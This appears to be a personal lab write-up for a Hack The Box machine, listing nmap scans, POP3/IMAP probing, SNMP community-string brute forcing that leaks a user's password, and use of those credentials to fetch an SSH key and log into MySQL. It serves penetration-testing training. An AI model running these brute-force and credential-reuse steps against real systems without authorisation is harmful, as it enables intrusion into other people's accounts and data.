# Creds HTB: tom:NMds732Js2761 # Enumeration ## Nmap Scans - fast nmap: `sudo nmap -p- --min rate 5000 10.129.202.20 -oN nmap-fast` ![[images/Pasted image 20250924190217.png]] - detailed scan: `sudo nmap -p22,110,143,993,995 -sC -sV 10.129.202.20 -oN nmap-services-1` ![[images/Pasted image 20250924190415.png]] - udp fast scan: `sudo nmap -p- -sU --min-rate 5000 10.129.202.20 -oN nmap--udp-fast` ![[images/Pasted image 20250924190747.png]] - impa/pop scan: `sudo nmap 10.129.202.20 -p110,143,993,995 -sC -sV` - nothing new ![[images/Pasted image 20250924192805.png]] ## Services ### SSH (22) - pubkey, password auth available - potential brute force? - `./ssh-audit.py 10.129.202.20` ![[images/Pasted image 20250924192259.png]] - we need a pubkey to login to ssh as tom ![[images/Pasted image 20250924195733.png]] ### pop3 (110,995) - `curl -k 'pop3s://10.129.202.20' -v` - issue CN=NIXHARF![[images/Pasted image 20250924191649.png]] - `sudo openssl s_client -connect 10.129.202.20:pop3s` - cannot issue commands without password ![[images/Pasted image 20250924191438.png]] ## imap (143,993) - `curl -k 'imaps://10.129.202.20' --user HTB -v` missing password - CN=NIXHARD ![[images/Pasted image 20250924190945.png]] - `sudo openssl s_client -connect 10.129.202.20:imaps` - cannot issue commands without password ![[images/Pasted image 20250924191327.png]] ### snmp (udp161) - `sudo nmap -sC -sV -p161 -sU 10.129.202.20` ![[images/Pasted image 20250924193009.png]] - `sudo snmpwalk -v2c -c public 10.129.202.20 > snmp.txt` - getting a timeout b/c it's UDP161? - `sudo nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.129.202.20` ![[images/Pasted image 20250924193640.png]] - `onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.129.202.20` - community string = backup; try with snmpwalk![[images/Pasted image 20250924195300.png]] - `snmpwalk -v2c -c backup 10.129.202.20` ![[images/Pasted image 20250924195442.png]] - ... ![[images/Pasted image 20250924195529.png]] - creds for tom leaked # foothold/exploit - leverage tom creds to access imap: `openssl s_client -connect 10.129.202.20:imaps` - Important inbox is empty but INBOX has tom's privkey ![[images/Pasted image 20250924200731.png]] - `sudo chmod 600 id_rsa` - `sudo ssh -i ./id_rsa [email protected]` - we're in! ![[images/Pasted image 20250924201021.png]] ![[images/Pasted image 20250924201524.png]] - another user named cry0l1t3 - `ls-al /home/tom` ![[images/Pasted image 20250924202225.png]] - lets look into `.mysql_history` ![[images/Pasted image 20250924202309.png]] - tom has been playing in the mysql db - connect to mysql: `mysql -u tom -pNMds732Js2761` ![[images/Pasted image 20250924202120.png]]